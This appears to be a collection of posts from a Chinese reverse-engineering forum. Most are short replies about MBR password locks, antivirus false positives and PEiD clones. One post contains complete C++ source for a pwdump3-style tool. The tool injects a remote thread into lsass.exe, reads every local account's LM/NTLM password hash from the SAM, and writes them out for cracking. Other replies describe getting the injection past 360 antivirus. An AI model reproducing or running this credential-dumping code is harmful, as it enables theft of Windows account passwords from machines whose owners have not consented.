|
[原创]利用qq2010聊天信息获取,打造自己的远程控制
顶,没有森林我们就造个森林 |
|
[讨论]尾递归~
递归占用大量栈,还有就是速度慢 |
|
[原创]基于MBR的系统登录密码验证程序(附代码)
不是,debug命令写太累,汇编用masm编译器,程序自动替换MBR,将第一扇区移到第十扇区然后简单XOR,系统启动时必须输入正确密码,程序还替换了Int13部分中断,和Int1C中断,当时想写个硬盘写保护程序来的(那时用的win98),后来发现在DOS下可实现写保护,但win98下不行就没继续了...。想想那时还没耍女朋友,成天整这玩艺儿,一晃十来年了,只记得程序要两次重定位,失败计算机就不能启动,然后用软盘引导,导出MBR,用debug分析...真有精神呀 |
|
[原创]创建远程线程,将代码注入到其它进程中执行
那我也发个吧,仿pwdump3(反汇编)写的,导出登陆密码的hash,然后用LC4解出密码,被360偷偷上传后报毒了....代码有点长样 #include "stdafx.h" #include <stdlib.h> #include <stdio.h> #include <conio.h> #include <windows.h> #include <winnt.h> #include <tlhelp32.h> #include <ntsecapi.h> //////////////////////////////////////////////// typedef DWORD HUSER; typedef DWORD HSAM; typedef DWORD HDOMAIN; typedef DWORD HUSER; typedef struct _sam_user_info { DWORD rid; LSA_UNICODE_STRING name; } SAM_USER_INFO; typedef struct _sam_user_enum { DWORD count; SAM_USER_INFO *users; }SAM_USER_ENUM; #define SAM_USER_INFO_PASSWORD_OWFS 0x12 /////////////////////////////////////////////// //------------------------------------- // 全局函数 //自定义线程中使用的函数 //-----------samsrv.dll---------------- typedef NTSTATUS (WINAPI *MSamIConnect) (DWORD, HSAM*, DWORD, DWORD); typedef NTSTATUS (WINAPI *MSamrOpenDomain) (HSAM, DWORD dwAccess, PSID, HDOMAIN*); typedef NTSTATUS (WINAPI *MSamrOpenUser) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*); typedef NTSTATUS (WINAPI *MSamrEnumerateUsersInDomain) (HDOMAIN, DWORD*, DWORD, SAM_USER_ENUM**, DWORD, PVOID); typedef NTSTATUS (WINAPI *MSamrQueryInformationUser) (HUSER, DWORD, PVOID); typedef HLOCAL (WINAPI *MSamIFree_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD); typedef HLOCAL (WINAPI *MSamIFree_SAMPR_ENUMERATION_BUUFER) (SAM_USER_ENUM*); typedef NTSTATUS (WINAPI *MSamrCloseHandle) (DWORD*); //----------User32.dll----------------- typedef int (WINAPI *MwsprintfA)(LPTSTR,LPCTSTR,...);//定义wsprintf函数 typedef int (WINAPI *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数 //----------Kernel32.dll--------------- typedef int (WINAPI *MWideCharToMultiByte)(UINT,DWORD,LPCWSTR,int,LPSTR,int,LPCSTR,LPBOOL); typedef HANDLE (WINAPI *MCreateFileA)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE); typedef BOOL (WINAPI *MWriteFile)(HANDLE,LPCVOID,DWORD,LPDWORD,LPOVERLAPPED); typedef BOOL (WINAPI *MCloseHandle)(HANDLE); typedef DWORD (WINAPI *MGetLastError)(void); //----------Advapi32.dll--------------- typedef NTSTATUS 
(WINAPI *MLsaOpenPolicy)(IN PLSA_UNICODE_STRING,IN PLSA_OBJECT_ATTRIBUTES,IN ACCESS_MASK,IN OUT PLSA_HANDLE); typedef NTSTATUS (WINAPI *MLsaQueryInformationPolicy)(IN LSA_HANDLE,IN POLICY_INFORMATION_CLASS,OUT PVOID); typedef NTSTATUS (WINAPI *MLsaClose)(IN LSA_HANDLE); DWORD GetLsassPID(); LPSTR GetErrorCode(int code); void InjectThread(); //------------------------------------- //**************************** // // 传递线程参数 // //**************************** typedef struct ThreadParam { //变量定义 TCHAR FileName[256]; TCHAR UserIDFormat[256]; TCHAR temp[32]; TCHAR format[256]; TCHAR format1[2]; TCHAR format2[5]; TCHAR format3[256]; TCHAR Msg[MAX_PATH]; TCHAR szUserName[256]; HANDLE hFile; DWORD dwSize; unsigned char *hash; LSA_OBJECT_ATTRIBUTES attributes; PLSA_UNICODE_STRING pSysName; LSA_HANDLE hLsa; POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo; HSAM hSam; HDOMAIN hDomain; NTSTATUS enumRc; SAM_USER_ENUM *pEnum; HUSER hUser; unsigned hashData[8]; DWORD hsSize; PVOID pHashData; DWORD dwEnum; DWORD dwNumber; int i; TCHAR magic; unsigned j; unsigned carrybit; //User32.dll库函数指针 DWORD dwMessageBox; DWORD pwsprintfA; //Kernel32.dll库函数指针 DWORD pWideCharToMultiByte; DWORD pCreateFileA; DWORD pWriteFile; DWORD pCloseHandle; DWORD pGetLastError; //Advapi32.dll库函数指针 DWORD pLsaOpenPolicy; DWORD pLsaQueryInformationPolicy; DWORD pLsaClose; //Samsrv.dll库函数指针 DWORD pSamIConnect; DWORD pSamrOpenDomain; DWORD pSamrOpenUser; DWORD pSamrQueryInformationUser; DWORD pSamrEnumerateUsersInDomain; DWORD pSamIFree_SAMPR_USER_INFO_BUFFER; DWORD pSamIFree_SAMPR_ENUMERATION_BUFFER; DWORD pSamrCloseHandle; }ThreadParam; //********************************************* // 远程线程函数 //********************************************* DWORD __stdcall ThreadProc(ThreadParam *lp) { //定义函数名 MMessageBoxA _MessageBoxA; MwsprintfA _wsprintfA; MWideCharToMultiByte _WideCharToMultiByte; MCreateFileA _CreateFileA; MWriteFile _WriteFile; MCloseHandle _CloseHandle; MGetLastError _GetLastError; MLsaOpenPolicy _LsaOpenPolicy; 
MLsaQueryInformationPolicy _LsaQueryInformationPolicy; MLsaClose _LsaClose; MSamIConnect _SamIConnect; MSamrOpenDomain _SamrOpenDomain; MSamrOpenUser _SamrOpenUser; MSamrEnumerateUsersInDomain _SamrEnumerateUsersInDomain; MSamrQueryInformationUser _SamrQueryInformationUser; MSamIFree_SAMPR_USER_INFO_BUFFER _SamIFree_SAMPR_USER_INFO_BUFFER; MSamIFree_SAMPR_ENUMERATION_BUUFER _SamIFree_SAMPR_ENUMERATION_BUFFER; MSamrCloseHandle _SamrCloseHandle; //取函数入口地址 _MessageBoxA=(MMessageBoxA)lp->dwMessageBox; _wsprintfA=(MwsprintfA)lp->pwsprintfA; _WideCharToMultiByte=(MWideCharToMultiByte)lp->pWideCharToMultiByte; _CreateFileA=(MCreateFileA)lp->pCreateFileA; _WriteFile=(MWriteFile)lp->pWriteFile; _CloseHandle=(MCloseHandle)lp->pCloseHandle; _GetLastError=(MGetLastError)lp->pGetLastError; _LsaOpenPolicy=(MLsaOpenPolicy)lp->pLsaOpenPolicy; _LsaQueryInformationPolicy=(MLsaQueryInformationPolicy)lp->pLsaQueryInformationPolicy; _LsaClose=(MLsaClose)lp->pLsaClose; _SamIConnect=(MSamIConnect)lp->pSamIConnect; _SamrOpenDomain=(MSamrOpenDomain)lp->pSamrOpenDomain; _SamrOpenUser=(MSamrOpenUser)lp->pSamrOpenUser; _SamrEnumerateUsersInDomain=(MSamrEnumerateUsersInDomain)lp->pSamrEnumerateUsersInDomain; _SamrQueryInformationUser=(MSamrQueryInformationUser)lp->pSamrQueryInformationUser; _SamIFree_SAMPR_USER_INFO_BUFFER=(MSamIFree_SAMPR_USER_INFO_BUFFER)lp->pSamIFree_SAMPR_USER_INFO_BUFFER; _SamIFree_SAMPR_ENUMERATION_BUFFER=(MSamIFree_SAMPR_ENUMERATION_BUUFER)lp->pSamIFree_SAMPR_ENUMERATION_BUFFER; _SamrCloseHandle=(MSamrCloseHandle)lp->pSamrCloseHandle; lp->hFile=_CreateFileA(lp->FileName, 0xc0000000,//GENERIC_READ | GENERIC_WRITE 0, NULL, 0x02,//CREATE_ALWAYS 0x80,//FILE_ATTRIBUTE_NORMAL NULL); _LsaOpenPolicy(lp->pSysName, &lp->attributes, POLICY_ALL_ACCESS, &lp->hLsa); _LsaQueryInformationPolicy(lp->hLsa, PolicyAccountDomainInformation, (void **)&lp->pDomainInfo); _SamIConnect(0, &lp->hSam, MAXIMUM_ALLOWED, 1); _SamrOpenDomain(lp->hSam, 0xf07ff, lp->pDomainInfo->DomainSid, 
&lp->hDomain); do { lp->enumRc=_SamrEnumerateUsersInDomain(lp->hDomain,&lp->dwEnum,0,&lp->pEnum,1000,&lp->dwNumber); if(lp->enumRc==0||lp->enumRc==0x105) { for(lp->i=0;lp->i<(int)lp->dwNumber;lp->i++) { memset(lp->szUserName,0,sizeof(lp->szUserName)); // Open the user (by Rid) _SamrOpenUser(lp->hDomain, MAXIMUM_ALLOWED, lp->pEnum->users[lp->i].rid, &lp->hUser); // Get the password OWFs _SamrQueryInformationUser(lp->hUser, SAM_USER_INFO_PASSWORD_OWFS, &lp->pHashData); lp->hsSize=min(sizeof(lp->szUserName),lp->pEnum->users[lp->i].name.Length>>1); _WideCharToMultiByte(CP_ACP, 0, lp->pEnum->users[lp->i].name.Buffer, -1, lp->szUserName, lp->hsSize, NULL, NULL); //写用户名及ID号 _wsprintfA(lp->szUserName,lp->UserIDFormat,lp->szUserName,lp->pEnum->users[lp->i].rid); _WriteFile(lp->hFile,lp->szUserName,strlen(lp->szUserName),&lp->dwSize,NULL); // memcpy(lp->hashData, lp->pHashData,32); // for(lp->j=0;lp->j<32;lp->j++) // { // lp->carrybit=(lp->magic & 0x00000001) ? 0x80000000 : 0; // lp->hashData ^= lp->magic; // lp->magic >>= 1; // lp->magic |= lp->carrybit; // lp->hashData++; // } //写散列(转换为如BillG:1010:5ECD9236D21095CE7584248B8D2C9F9E:C04EB42B9F5B114C86921C4163AEB5B1:::模式) memset(lp->temp,0,sizeof(lp->temp)); lp->hash=(unsigned char *)lp->pHashData+16; _wsprintfA(lp->temp,lp->format3, lp->hash[0], lp->hash[1], lp->hash[2], lp->hash[3], lp->hash[4], lp->hash[5], lp->hash[6], lp->hash[7], lp->hash[8], lp->hash[9], lp->hash[10], lp->hash[11], lp->hash[12], lp->hash[13], lp->hash[14], lp->hash[15]); _WriteFile(lp->hFile,lp->temp,32,&lp->dwSize,NULL); _WriteFile(lp->hFile,lp->format1,1,&lp->dwSize,NULL);//写":" memset(lp->temp,0,sizeof(lp->temp)); lp->hash=(unsigned char *)lp->pHashData; _wsprintfA(lp->temp,lp->format3, lp->hash[0], lp->hash[1], lp->hash[2], lp->hash[3], lp->hash[4], lp->hash[5], lp->hash[6], lp->hash[7], lp->hash[8], lp->hash[9], lp->hash[10], lp->hash[11], lp->hash[12], lp->hash[13], lp->hash[14], lp->hash[15]); _WriteFile(lp->hFile,lp->temp,32,&lp->dwSize,NULL); 
_WriteFile(lp->hFile,lp->format2,sizeof(lp->format2),&lp->dwSize,NULL); _SamIFree_SAMPR_USER_INFO_BUFFER(lp->pHashData, SAM_USER_INFO_PASSWORD_OWFS); lp->pHashData=0; _SamrCloseHandle(&lp->hUser); lp->hUser=0; } _SamIFree_SAMPR_ENUMERATION_BUFFER(lp->pEnum); lp->pEnum=NULL; } }while(lp->enumRc==0x105); _SamrCloseHandle(&lp->hUser); _SamrCloseHandle(&lp->hDomain); _SamrCloseHandle(&lp->hSam); _LsaClose(lp->hLsa); _CloseHandle(lp->hFile); return 0; } //============================================= // // 提升进程权限 // hProcess [in] : 要提升的进程,目标进程 // lpPrivilegeName [in] : 要提升到的特权,目标特权 // 返回值 : TRUE : 成功; FALSE : 失败 // //============================================= BOOL UpdateProcessPrivilege(HANDLE hProcess,LPCTSTR lpPrivilegeName=SE_DEBUG_NAME) { HANDLE hToken; if(::OpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken)) { LUID destLuid; if(::LookupPrivilegeValue(NULL,lpPrivilegeName,&destLuid)) { TOKEN_PRIVILEGES TokenPrivileges; TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; TokenPrivileges.Privileges[0].Luid = destLuid; int iResult; if(iResult=::AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,0,NULL,NULL)) { return TRUE; } } } return FALSE; } //============================================= // 得到LSASS.EXE进程ID //失败返回:0 //成功返回:LSASS进程ID // //============================================= DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE ) { printf("调用CreateToolhelp32Snapshot函数失败:%s\n",GetErrorCode(::GetLastError())); return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! 
return 0; } do { if(strcmpi(pe32.szExeFile,"LSASS.EXE")==0) { PID = pe32.th32ProcessID; printf("lsass.exe的PID:%d\n",PID); break; } }while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); return PID; } //============================================= // 获得错误代码具体内容 //成功返回:错误代码的消息内容 // //============================================= LPSTR GetErrorCode(int code) { int nErrorCode; TCHAR strErrorMessage[1024]; LPVOID lpMsgBuf; TCHAR buf[512]; lpMsgBuf=LocalLock(LocalAlloc(LMEM_MOVEABLE|LMEM_ZEROINIT,1000)); if(lpMsgBuf==NULL) { printf("内存分配失败!"); exit(1); } nErrorCode=code; SetLastError(nErrorCode); FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM| FORMAT_MESSAGE_IGNORE_INSERTS, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL); ::wsprintf(strErrorMessage,"%s",lpMsgBuf); // strErrorMessage=(LPCTSTR)lpMsgBuf; if(strErrorMessage=="") { printf("未知错误!"); } else { // msg=strErrorMessage; } LocalFree(lpMsgBuf); wsprintf(buf,"%s",strErrorMessage); return buf; } //============================================= // 全局函数 // 初始化远程线程参数 // //============================================= void InitThreadParam(ThreadParam *tp) { //结构清零 ::ZeroMemory(tp,sizeof(tp)); strcpy(tp->Msg,"你好!线程嵌入成功!\0"); strcpy(tp->format,"错误代码:%d 地址:%08X 地址:%08X\n"); strcpy(tp->UserIDFormat,"%s:%d:"); strcpy(tp->format1,":"); wsprintf(tp->format2,":::%c%c",0x0d,0x0a); strcpy(tp->format3,"%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X"); //取User32.dll函数 HINSTANCE hUser32=::LoadLibrary("user32.dll"); tp->pwsprintfA=(DWORD)::GetProcAddress(hUser32,"wsprintfA"); tp->dwMessageBox=(DWORD)::GetProcAddress(hUser32,"MessageBoxA"); //取Kernel32.dll函数 HINSTANCE hKernel32=::LoadLibrary("Kernel32.dll"); tp->pWideCharToMultiByte=(DWORD)::GetProcAddress(hKernel32,"WideCharToMultiByte"); tp->pCreateFileA=(DWORD)::GetProcAddress(hKernel32,"CreateFileA"); 
tp->pWriteFile=(DWORD)::GetProcAddress(hKernel32,"WriteFile"); tp->pCloseHandle=(DWORD)::GetProcAddress(hKernel32,"CloseHandle"); tp->pGetLastError=(DWORD)::GetProcAddress(hKernel32,"GetLastError"); //取Advapi32.dll函数 HINSTANCE hAdvapi32=::LoadLibrary("Advapi32.dll"); tp->pLsaOpenPolicy=(DWORD)::GetProcAddress(hAdvapi32,"LsaOpenPolicy"); tp->pLsaQueryInformationPolicy=(DWORD)::GetProcAddress(hAdvapi32,"LsaQueryInformationPolicy"); tp->pLsaClose=(DWORD)::GetProcAddress(hAdvapi32,"LsaClose"); //取Samsrv.dll函数 HINSTANCE hSamsrv; hSamsrv=LoadLibrary("samsrv.dll"); tp->pSamIConnect=(DWORD)GetProcAddress(hSamsrv,"SamIConnect"); tp->pSamrOpenDomain=(DWORD)GetProcAddress(hSamsrv,"SamrOpenDomain"); tp->pSamrOpenUser=(DWORD)GetProcAddress(hSamsrv,"SamrOpenUser"); tp->pSamrQueryInformationUser=(DWORD)GetProcAddress(hSamsrv,"SamrQueryInformationUser"); tp->pSamrEnumerateUsersInDomain=(DWORD)GetProcAddress(hSamsrv,"SamrEnumerateUsersInDomain"); tp->pSamIFree_SAMPR_USER_INFO_BUFFER=(DWORD)GetProcAddress(hSamsrv,"SamIFree_SAMPR_USER_INFO_BUFFER"); tp->pSamIFree_SAMPR_ENUMERATION_BUFFER=(DWORD)GetProcAddress(hSamsrv,"SamIFree_SAMPR_ENUMERATION_BUFFER"); tp->pSamrCloseHandle=(DWORD)GetProcAddress(hSamsrv,"SamrCloseHandle"); if(!tp->pSamIConnect || !tp->pSamrOpenDomain || !tp->pSamrOpenUser || !tp->pSamrQueryInformationUser || !tp->pSamrEnumerateUsersInDomain || !tp->pSamIFree_SAMPR_USER_INFO_BUFFER || !tp->pSamIFree_SAMPR_ENUMERATION_BUFFER || !tp->pSamrCloseHandle) { printf("获取samsrv.dll库函数失败:%s",GetErrorCode(GetLastError())); if(hSamsrv) FreeLibrary(hSamsrv); } //初始化变量 memset(&tp->attributes,0,sizeof(LSA_OBJECT_ATTRIBUTES)); tp->attributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES); //获取计算机名 TCHAR ComName[MAX_COMPUTERNAME_LENGTH+1]; DWORD dwSize=256; TCHAR Name[MAX_PATH]; TCHAR FileName[MAX_PATH]; BOOL Flag=true; GetCurrentDirectory(MAX_PATH,Name); //获取应用程序所在目录 GetModuleFileName(NULL,Name,MAX_PATH); GetComputerName(ComName,&dwSize); int i=strlen(Name); while(Flag) { i--; 
if(Name[i]=='\\') { Name[i+1]='\0'; Flag=false; } } wsprintf(FileName,"%s%s.txt",Name,ComName); printf("创建文件名:〖%s〗\n",FileName); strcpy(tp->FileName,FileName); tp->hash=NULL; tp->magic=NULL; tp->pHashData=0; tp->hUser=0; tp->i=0; tp->pEnum=NULL; tp->dwEnum=0; tp->hDomain=0; tp->hSam=0; tp->hFile=NULL; tp->pSysName=NULL; tp->hLsa=0; //释放库 if(hAdvapi32) FreeLibrary(hAdvapi32); if(hUser32) FreeLibrary(hUser32); if(hKernel32) FreeLibrary(hKernel32); if(hSamsrv) FreeLibrary(hSamsrv); return; } //============================================= //============================================= // 插入远程线程 //将函数体ThreadProc及其参数插入到LSASS进程中 // //============================================= void InjectThread() { //暂定线程体大小为4K const DWORD THREADSIZE=1024*10; HANDLE lsasshWnd=::OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,//无限制访问 FALSE, GetLsassPID()); //进程ID if(lsasshWnd==NULL) { printf("打开进程错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } DWORD ReAddr = NULL; //为远程线程执行体分配内存 void * ThreadAddr=::VirtualAllocEx(lsasshWnd, 0, THREADSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(ThreadAddr==NULL) { printf("分配远程进程内存失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } printf("远程线程地址:%08X\n",ThreadAddr); //写线程执行体到远程进程 if(!::WriteProcessMemory(lsasshWnd,ThreadAddr,&ThreadProc,THREADSIZE,0)) { printf("写远程进程%08X错%d:%s\n",ThreadAddr,GetLastError(),GetErrorCode(GetLastError())); return; } //初始化线程参数 ThreadParam tp; //初始化参数函数 InitThreadParam(&tp); //将参数写进远程目标进程 ThreadParam *tpaddr=(ThreadParam *)::VirtualAllocEx(lsasshWnd, NULL, sizeof(ThreadParam), MEM_COMMIT, PAGE_READWRITE);//注意申请空间时的页面属性 if(tpaddr==NULL) { printf("分配指定进程内存参数错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } if(!::WriteProcessMemory(lsasshWnd,tpaddr,&tp,sizeof(tp),0)) { printf("写远程进程参数错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } //启动线程 printf("启动在LSASS.EXE进程中的远程线程....\n"); DWORD ThreadID; HANDLE 
hThread=::CreateRemoteThread(lsasshWnd, NULL, 0, (DWORD (__stdcall *)(void *))ThreadAddr, tpaddr, 0, &ThreadID); if(hThread==NULL) { //还有内存分配未释放 printf("启动远程线程错%d:%s\n",GetErrorCode(GetLastError())); return; } printf("等待远程线程返回....."); //等待远程线程结束 WaitForSingleObject(hThread,INFINITE); //释放调用进程内存 VirtualFreeEx(lsasshWnd, //HANDLE 0, // sizeof(tp), //SIZE MEM_DECOMMIT);//收回提交页面指定区域 VirtualFreeEx(hThread,//HANDLE 0, // THREADSIZE, //SIZE MEM_DECOMMIT);//收回提交页面指定区域 CloseHandle(hThread); CloseHandle(lsasshWnd); return; } int main(int argc, char* argv[]) { printf("\t\tCopyRight By lankerr 2007-09-14\n"); if(UpdateProcessPrivilege(::GetCurrentProcess(),SE_DEBUG_NAME)) printf("提升权限成功!\n"); //远程线程 InjectThread(); printf("\n程序执行完毕!\n"); return 0; } |
|
[讨论]360报毒
360还不经过同意上传写的文件,过两天这文件被报毒 |
|
[原创]基于MBR的系统登录密码验证程序(附代码)
我以前学汇编也写了个硬盘锁,和上面的差不多。不过还没实现外壳写入MBR |
|
[求助]如何破解通过文件获取使用次数和时间的软件?
这些可能是商用保护程序保护的,先找找是哪种商业软件保护。然后.... |
|
[求助]远程注入Lsass.exe失败的问题?
还真是360的原因,删除360就可以了。可惜装不起softice,不然可以看是在哪被过滤的. |
|
[原创]最近写了个仿PEiD的东西...
放个VC6的,识别为加壳 |
|
[求助]远程注入Lsass.exe失败的问题?
在explorer.exe中是成功的! |